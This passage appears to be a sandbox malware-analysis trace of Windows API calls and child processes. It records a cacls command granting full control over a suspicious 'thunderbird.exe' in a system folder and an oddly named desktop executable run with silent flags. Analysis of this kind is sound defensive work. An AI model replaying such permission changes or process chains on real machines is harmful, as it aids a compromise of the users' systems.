[0229.746] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0229.746] GetProcessHeap () returned 0x5d0000 [0229.746] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x5eaf40 | out: hHeap=0x5d0000) returned 1 [0229.746] GetEnvironmentStringsW () returned 0x5e2cb8* [0229.746] GetProcessHeap () returned 0x5d0000 [0229.746] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0xb88) returned 0x5eaf40 [0229.746] FreeEnvironmentStringsW (penv=0x5e2cb8) returned 1 [0229.746] GetProcessHeap () returned 0x5d0000 [0229.747] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x5e00d8 | out: hHeap=0x5d0000) returned 1 [0229.747] DeleteProcThreadAttributeList (in: lpAttributeList=0x28f08c | out: lpAttributeList=0x28f08c) [0229.747] _get_osfhandle (_FileHandle=1) returned 0x80 [0229.747] SetConsoleMode (hConsoleHandle=0x80, dwMode=0x0) returned 0 [0229.747] _get_osfhandle (_FileHandle=1) returned 0x80 [0229.747] GetConsoleMode (in: hConsoleHandle=0x80, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 0 [0229.747] _get_osfhandle (_FileHandle=0) returned 0x3 [0229.747] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0229.748] SetConsoleInputExeNameW () returned 0x1 [0229.748] GetConsoleOutputCP () returned 0x1b5 [0229.748] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0229.748] SetThreadUILanguage (LangId=0x0) returned 0x409 [0229.749] exit (_Code=0) Process: id = "176" image_name = "cacls.exe" filename = "c:\\windows\\syswow64\\cacls.exe" page_root = "0x2f268000" os_pid = "0xad0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "163" os_parent_pid = "0xa18" cmd_line = "cacls \"C:\\Program Files\\Windows Portable Devices\\thunderbird.exe\" /E /G 5p5NrGJn0jS HALPmcxz:F /C" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 705 os_tid = 0xb20 Process: id = "177" image_name = "tdq963ii.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tdq963ii.exe" page_root = "0x2dca8000" os_pid = "0xb84" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "132" os_parent_pid = "0x7b0" cmd_line = "tdq963ii.exe -accepteula -c Run -y -p extract -nobanner" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 707 os_tid = 0x620 [0185.088] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76d30000 [0185.089] GetProcAddress (hModule=0x76d30000, lpProcName="SetEvent") returned 0x76d416c5 [0185.089] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForSingleObject") returned 0x76d41136 [0185.089] GetProcAddress (hModule=0x76d30000, lpProcName="DeviceIoControl") returned 0x76d4322f [0185.089] GetProcAddress (hModule=0x76d30000, lpProcName="DuplicateHandle") returned 0x76d41886 [0185.089] GetProcAddress (hModule=0x76d30000, lpProcName="FormatMessageW") returned 0x76d44620 [0185.089] GetProcAddress (hModule=0x76d30000, lpProcName="CreateEventW") returned 0x76d4183e [0185.090] GetProcAddress (hModule=0x76d30000, lpProcName="CreateProcessW") returned 0x76d4103d [0185.090] GetProcAddress (hModule=0x76d30000, lpProcName="ExpandEnvironmentStringsW") returned 0x76d44173 [0185.090] GetProcAddress (hModule=0x76d30000, lpProcName="GetDriveTypeW") returned 0x76d4418b [0185.090] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemDirectoryW") returned 0x76d45063 [0185.090] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteFileW") returned 0x76d489b3 [0185.091] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadErrorMode") returned 0x76dbaf42 [0185.091] GetProcAddress (hModule=0x76d30000, lpProcName="HeapSize") returned 0x77c73002 [0185.091] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringW") returned 0x76d417b9 [0185.091] GetProcAddress (hModule=0x76d30000, lpProcName="GetStringTypeW") returned 0x76d41946 [0185.091] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateThread") returned 0x76d47a2f [0185.092] GetProcAddress (hModule=0x76d30000, lpProcName="OpenProcess") returned 0x76d41986 [0185.093] GetProcAddress (hModule=0x76d30000, lpProcName="GetVersion") returned 0x76d44467 [0185.093] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileW") returned 0x76d43f5c [0185.093] GetProcAddress (hModule=0x76d30000, lpProcName="FindResourceW") returned 0x76d45971 [0185.093] GetProcAddress (hModule=0x76d30000, lpProcName="SizeofResource") returned 0x76d45ac9 [0185.094] GetProcAddress (hModule=0x76d30000, lpProcName="CloseHandle") returned 0x76d41410 [0185.094] GetProcAddress (hModule=0x76d30000, lpProcName="SetLastError") returned 0x76d411a9 [0185.094] GetProcAddress (hModule=0x76d30000, lpProcName="LoadResource") returned 0x76d4594c [0185.094] GetProcAddress (hModule=0x76d30000, lpProcName="GetLastError") returned 0x76d411c0 [0185.095] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcess") returned 0x76d41809 [0185.095] GetProcAddress (hModule=0x76d30000, lpProcName="LockResource") returned 0x76d45959 [0185.095] GetProcAddress (hModule=0x76d30000, lpProcName="GetCommandLineW") returned 0x76d45223 [0185.095] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleW") returned 0x76d434b0 [0185.096] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryW") returned 0x76d4492b [0185.096] GetProcAddress (hModule=0x76d30000, lpProcName="GetStdHandle") returned 0x76d451b3 [0185.096] GetProcAddress (hModule=0x76d30000, lpProcName="LocalFree") returned 0x76d42d3c [0185.096] GetProcAddress (hModule=0x76d30000, lpProcName="LocalAlloc") returned 0x76d4168c [0185.096] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcAddress") returned 0x76d41222 [0185.097] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleFileNameW") returned 0x76d44950 [0185.097] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleScreenBufferInfo") returned 0x76d6bafd [0185.097] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileType") returned 0x76d43531 [0185.097] GetProcAddress (hModule=0x76d30000, lpProcName="OutputDebugStringW") returned 0x76d6d1d4 [0185.097] GetProcAddress (hModule=0x76d30000, lpProcName="ReadConsoleW") returned 0x76de739a [0185.097] GetProcAddress (hModule=0x76d30000, lpProcName="WriteConsoleW") returned 0x76d67aca [0185.098] GetProcAddress (hModule=0x76d30000, lpProcName="SetFilePointerEx") returned 0x76d5c807 [0185.098] GetProcAddress (hModule=0x76d30000, lpProcName="EnterCriticalSection") returned 0x77c622b0 [0185.098] GetProcAddress (hModule=0x76d30000, lpProcName="LeaveCriticalSection") returned 0x77c62270 [0185.098] GetProcAddress (hModule=0x76d30000, lpProcName="SetStdHandle") returned 0x76dc454f [0185.098] GetProcAddress (hModule=0x76d30000, lpProcName="HeapAlloc") returned 0x77c6e026 [0185.099] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0185.099] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0185.099] GetProcAddress (hModule=0x76d30000, lpProcName="ExitProcess") returned 0x76d47a10 [0185.099] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleExW") returned 0x76d44a6f [0185.099] GetProcAddress (hModule=0x76d30000, lpProcName="MultiByteToWideChar") returned 0x76d4192e [0185.100] GetProcAddress (hModule=0x76d30000, lpProcName="WideCharToMultiByte") returned 0x76d4170d [0185.100] GetProcAddress (hModule=0x76d30000, lpProcName="HeapFree") returned 0x76d414c9 [0185.100] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleMode") returned 0x76d41328 [0185.100] GetProcAddress (hModule=0x76d30000, lpProcName="ReadConsoleInputA") returned 0x76de6f53 [0185.100] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleMode") returned 0x76d5a77d [0185.100] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThread") returned 0x76d434d5 [0185.100] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentThreadId") returned 0x76d41450 [0185.101] GetProcAddress (hModule=0x76d30000, lpProcName="ExitThread") returned 0x77c9d598 [0185.101] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryExW") returned 0x76d4495d [0185.101] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteCriticalSection") returned 0x77c745f5 [0185.101] GetProcAddress (hModule=0x76d30000, lpProcName="FlushFileBuffers") returned 0x76d4469b [0185.101] GetProcAddress (hModule=0x76d30000, lpProcName="WriteFile") returned 0x76d41282 [0185.101] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleCP") returned 0x76de7bff [0185.102] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0185.102] GetProcAddress (hModule=0x76d30000, lpProcName="IsProcessorFeaturePresent") returned 0x76d45235 [0185.102] GetProcAddress (hModule=0x76d30000, lpProcName="ReadFile") returned 0x76d43ed3 [0185.102] GetProcAddress (hModule=0x76d30000, lpProcName="GetStartupInfoW") returned 0x76d44d40 [0185.102] GetProcAddress (hModule=0x76d30000, lpProcName="UnhandledExceptionFilter") returned 0x76d6772f [0185.103] GetProcAddress (hModule=0x76d30000, lpProcName="SetUnhandledExceptionFilter") returned 0x76d487c9 [0185.103] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x76d41916 [0185.103] GetProcAddress (hModule=0x76d30000, lpProcName="Sleep") returned 0x76d410ff [0185.103] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateProcess") returned 0x76d5d802 [0185.104] GetProcAddress (hModule=0x76d30000, lpProcName="TlsAlloc") returned 0x76d449ad [0185.104] GetProcAddress (hModule=0x76d30000, lpProcName="TlsGetValue") returned 0x76d411e0 [0185.104] GetProcAddress (hModule=0x76d30000, lpProcName="TlsSetValue") returned 0x76d414fb [0185.104] GetProcAddress (hModule=0x76d30000, lpProcName="TlsFree") returned 0x76d43587 [0185.105] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidCodePage") returned 0x76d44493 [0185.105] GetProcAddress (hModule=0x76d30000, lpProcName="GetACP") returned 0x76d4179c [0185.105] GetProcAddress (hModule=0x76d30000, lpProcName="GetOEMCP") returned 0x76d6d1a1 [0185.105] GetProcAddress (hModule=0x76d30000, lpProcName="GetCPInfo") returned 0x76d45189 [0185.105] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcessHeap") returned 0x76d414e9 [0185.106] GetProcAddress (hModule=0x76d30000, lpProcName="RtlUnwind") returned 0x76d6d1c3 [0185.106] GetProcAddress (hModule=0x76d30000, lpProcName="QueryPerformanceCounter") returned 0x76d41725 [0185.106] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessId") returned 0x76d411f8 [0185.106] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemTimeAsFileTime") returned 0x76d43509 [0185.106] GetProcAddress (hModule=0x76d30000, lpProcName="GetEnvironmentStringsW") returned 0x76d451e3 [0185.106] GetProcAddress (hModule=0x76d30000, lpProcName="FreeEnvironmentStringsW") returned 0x76d451cb [0185.107] GetProcAddress (hModule=0x76d30000, lpProcName="HeapReAlloc") returned 0x77c81f6e [0185.107] GetProcAddress (hModule=0x76d30000, lpProcName="SetEndOfFile") returned 0x76d5ce2e [0185.107] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77710000 [0185.107] GetProcAddress (hModule=0x77710000, lpProcName="GetTokenInformation") returned 0x7772431c [0185.108] GetProcAddress (hModule=0x77710000, lpProcName="RegDeleteKeyW") returned 0x77721272 [0185.108] GetProcAddress (hModule=0x77710000, lpProcName="LookupPrivilegeValueW") returned 0x777241b3 [0185.108] GetProcAddress (hModule=0x77710000, lpProcName="AdjustTokenPrivileges") returned 0x7772418e [0185.108] GetProcAddress (hModule=0x77710000, lpProcName="OpenProcessToken") returned 0x77724304 [0185.109] GetProcAddress (hModule=0x77710000, lpProcName="RegSetValueExW") returned 0x777214d6 [0185.109] GetProcAddress (hModule=0x77710000, lpProcName="RegQueryValueExW") returned 0x777246ad [0185.109] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyExW") returned 0x7772468d [0185.109] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyW") returned 0x77722459 [0185.109] GetProcAddress (hModule=0x77710000, lpProcName="RegCreateKeyW") returned 0x77721514 [0185.109] GetProcAddress (hModule=0x77710000, lpProcName="RegCloseKey") returned 0x7772469d [0185.110] GetProcAddress (hModule=0x77710000, lpProcName="LookupAccountSidW") returned 0x77724874 [0185.110] LoadLibraryA (lpLibFileName="COMDLG32.dll") returned 0x77270000 [0185.110] GetProcAddress (hModule=0x77270000, lpProcName="PrintDlgW") returned 0x772733a3 [0185.110] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x770a0000 [0185.110] GetProcAddress (hModule=0x770a0000, lpProcName="StartPage") returned 0x770e401a [0185.110] GetProcAddress (hModule=0x770a0000, lpProcName="EndDoc") returned 0x770e3f29 [0185.111] GetProcAddress (hModule=0x770a0000, lpProcName="StartDocW") returned 0x770e4c51 [0185.111] GetProcAddress (hModule=0x770a0000, lpProcName="SetMapMode") returned 0x770bb02f [0185.111] GetProcAddress (hModule=0x770a0000, lpProcName="GetDeviceCaps") returned 0x770b4de0 [0185.111] GetProcAddress (hModule=0x770a0000, lpProcName="EndPage") returned 0x770c6bde [0185.111] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x77130000 [0185.112] GetProcAddress (hModule=0x77130000, lpProcName="SendMessageW") returned 0x77149679 [0185.112] GetProcAddress (hModule=0x77130000, lpProcName="DialogBoxIndirectParamW") returned 0x7716cbf3 [0185.112] GetProcAddress (hModule=0x77130000, lpProcName="EndDialog") returned 0x7716b99c [0185.112] GetProcAddress (hModule=0x77130000, lpProcName="LoadCursorW") returned 0x771488f7 [0185.112] GetProcAddress (hModule=0x77130000, lpProcName="InflateRect") returned 0x77153309 [0185.112] GetProcAddress (hModule=0x77130000, lpProcName="GetSysColorBrush") returned 0x771535a4 [0185.113] GetProcAddress (hModule=0x77130000, lpProcName="SetCursor") returned 0x771541f6 [0185.113] GetProcAddress (hModule=0x77130000, lpProcName="SetWindowTextW") returned 0x771520ec [0185.113] GetProcAddress (hModule=0x77130000, lpProcName="GetDlgItem") returned 0x7716f1ba [0185.113] LoadLibraryA (lpLibFileName="VERSION.dll") returned 0x75440000 [0185.113] GetProcAddress (hModule=0x75440000, lpProcName="GetFileVersionInfoW") returned 0x754419f4 [0185.113] GetProcAddress (hModule=0x75440000, lpProcName="VerQueryValueW") returned 0x75441b51 [0185.113] GetProcAddress (hModule=0x75440000, lpProcName="GetFileVersionInfoSizeW") returned 0x754419d9 [0185.113] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x4, lpflOldProtect=0x18ff68 | out: lpflOldProtect=0x18ff68*=0x2) returned 1 [0185.773] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x2, lpflOldProtect=0x18ff68 | out: lpflOldProtect=0x18ff68*=0x4) returned 1 [0185.783] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff78 | out: lpSystemTimeAsFileTime=0x18ff78*(dwLowDateTime=0x27f3b840, dwHighDateTime=0x1d68287)) [0185.783] GetCurrentThreadId () returned 0x620 [0185.783] GetCurrentProcessId () returned 0xb84 [0185.783] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff70 | out: lpPerformanceCount=0x18ff70*=30612254823) returned 1 [0185.792] GetProcessHeap () returned 0x590000 [0187.029] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0187.029] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0187.030] GetProcAddress (hModule=0x76d30000, lpProcName="FlsFree") returned 0x76d4359f [0187.030] GetProcAddress (hModule=0x76d30000, lpProcName="FlsGetValue") returned 0x76d41252 [0187.030] GetProcAddress (hModule=0x76d30000, lpProcName="FlsSetValue") returned 0x76d44208 [0187.031] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionEx") returned 0x76d44d28 [0187.031] GetProcAddress (hModule=0x76d30000, lpProcName="CreateEventExW") returned 0x76dc410b [0187.031] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSemaphoreExW") returned 0x76dc4195 [0187.031] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadStackGuarantee") returned 0x76d4d31f [0187.032] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThreadpoolTimer") returned 0x76d5ee7e [0187.032] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadpoolTimer") returned 0x77c8441c [0187.032] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x77cac50e [0187.032] GetProcAddress (hModule=0x76d30000, lpProcName="CloseThreadpoolTimer") returned 0x77cac381 [0187.033] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThreadpoolWait") returned 0x76d5f088 [0187.033] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadpoolWait") returned 0x77c905d7 [0187.033] GetProcAddress (hModule=0x76d30000, lpProcName="CloseThreadpoolWait") returned 0x77caca24 [0187.033] GetProcAddress (hModule=0x76d30000, lpProcName="FlushProcessWriteBuffers") returned 0x77c60b8c [0187.033] GetProcAddress (hModule=0x76d30000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x77d1fde8 [0187.034] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessorNumber") returned 0x77cb1e1d [0187.034] GetProcAddress (hModule=0x76d30000, lpProcName="GetLogicalProcessorInformation") returned 0x76dc4761 [0187.034] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSymbolicLinkW") returned 0x76dbcd11 [0187.034] GetProcAddress (hModule=0x76d30000, lpProcName="SetDefaultDllDirectories") returned 0x0 [0187.034] GetProcAddress (hModule=0x76d30000, lpProcName="EnumSystemLocalesEx") returned 0x76dc424f [0187.034] GetProcAddress (hModule=0x76d30000, lpProcName="CompareStringEx") returned 0x76dc46b1 [0187.035] GetProcAddress (hModule=0x76d30000, lpProcName="GetDateFormatEx") returned 0x76dd6676 [0187.035] GetProcAddress (hModule=0x76d30000, lpProcName="GetLocaleInfoEx") returned 0x76dc4751 [0187.035] GetProcAddress (hModule=0x76d30000, lpProcName="GetTimeFormatEx") returned 0x76dd65f1 [0187.035] GetProcAddress (hModule=0x76d30000, lpProcName="GetUserDefaultLocaleName") returned 0x76dc47c1 [0187.035] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidLocaleName") returned 0x76dc47e1 [0187.036] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringEx") returned 0x76dc47f1 [0187.036] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentPackageId") returned 0x0 [0187.036] GetProcAddress (hModule=0x76d30000, lpProcName="GetTickCount64") returned 0x76d5eee0 [0187.036] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileInformationByHandleExW") returned 0x0 [0187.036] GetProcAddress (hModule=0x76d30000, lpProcName="SetFileInformationByHandleW") returned 0x0 [0187.579] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x3bc) returned 0x5a70b8 [0187.579] GetCurrentThreadId () returned 0x620 [0187.579] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x18) returned 0x5a7480 [0187.579] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x800) returned 0x5a74a0 [0187.579] GetStartupInfoW (in: lpStartupInfo=0x18fed8 | out: lpStartupInfo=0x18fed8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="tdq963ii.exe -accepteula -c Run -y -p extract -nobanner", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x40ad42, hStdOutput=0x684c7bf, hStdError=0x0)) [0187.580] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3 [0187.580] GetFileType (hFile=0x3) returned 0x2 [0187.580] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0187.580] GetFileType (hFile=0x7) returned 0x2 [0187.580] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0187.580] GetFileType (hFile=0xb) returned 0x2 [0187.581] GetCommandLineW () returned="tdq963ii.exe -accepteula -c Run -y -p extract -nobanner" [0187.581] GetEnvironmentStringsW () returned 0x5a7ca8* [0187.581] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0xb92) returned 0x5a8848 [0187.584] FreeEnvironmentStringsW (penv=0x5a7ca8) returned 1 [0187.584] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x426ea0, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tdq963ii.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tdq963ii.exe")) returned 0x32 [0187.584] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x94) returned 0x5a7ca8 [0187.586] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0xa0) returned 0x5a7d48 [0187.586] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x3e) returned 0x5a4de8 [0187.589] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x6c) returned 0x5a7df0 [0187.589] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x6e) returned 0x5a7e68 [0187.589] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x78) returned 0x59f918 [0187.589] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x62) returned 0x5a7ee0 [0187.589] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x2e) returned 0x5a7f50 [0187.589] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x48) returned 0x5a7f88 [0187.589] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x36) returned 0x5a7fd8 [0187.589] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x28) returned 0x5a8018 [0187.589] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x1a) returned 0x5a6a88 [0187.589] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x4a) returned 0x5a8048 [0187.589] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x72) returned 0x59f998 [0187.589] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x30) returned 0x5a80a0 [0187.589] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x2e) returned 0x5a80d8 [0187.589] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x1c) returned 0x5a6ab0 [0187.589] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0xd2) returned 0x5a8110 [0187.589] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x7c) returned 0x5a81f0 [0187.589] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x36) returned 0x5a8278 [0187.589] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x3a) returned 0x5a4e30 [0187.589] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x90) returned 0x5a82b8 [0187.590] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x24) returned 0x5a8350 [0187.590] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x30) returned 0x5a8380 [0187.590] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x36) returned 0x5a83b8 [0187.590] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x48) returned 0x5a83f8 [0187.590] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x52) returned 0x5a8448 [0187.590] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x3c) returned 0x5a4e78 [0187.590] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x18) returned 0x5a84a8 [0187.590] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x82) returned 0x5a84c8 [0187.590] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x2e) returned 0x5a8558 [0187.590] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x1e) returned 0x5a6ad8 [0187.590] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x2c) returned 0x5a8590 [0187.590] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x54) returned 0x5a85c8 [0187.590] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x52) returned 0x5a8628 [0187.590] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x2a) returned 0x5a8688 [0187.590] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x3c) returned 0x5a4ec0 [0187.590] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x54) returned 0x5a86c0 [0187.590] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x24) returned 0x5a8720 [0187.590] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x30) returned 0x5a8750 [0187.590] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x8c) returned 0x5a8788 [0187.590] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a8848 | out: hHeap=0x590000) returned 1 [0187.766] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x800) returned 0x5a8820 [0187.766] GetLastError () returned 0x0 [0187.766] SetLastError (dwErrCode=0x0) [0187.766] GetLastError () returned 0x0 [0187.767] SetLastError (dwErrCode=0x0) [0187.767] GetLastError () returned 0x0 [0187.767] SetLastError (dwErrCode=0x0) [0187.767] GetACP () returned 0x4e4 [0187.767] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x220) returned 0x5a9028 [0187.767] GetLastError () returned 0x0 [0187.767] SetLastError (dwErrCode=0x0) [0187.767] IsValidCodePage (CodePage=0x4e4) returned 1 [0187.767] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fecc | out: lpCPInfo=0x18fecc) returned 1 [0187.767] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f994 | out: lpCPInfo=0x18f994) returned 1 [0187.770] GetLastError () returned 0x0 [0187.770] SetLastError (dwErrCode=0x0) [0187.770] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0187.772] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f718, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0187.772] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" 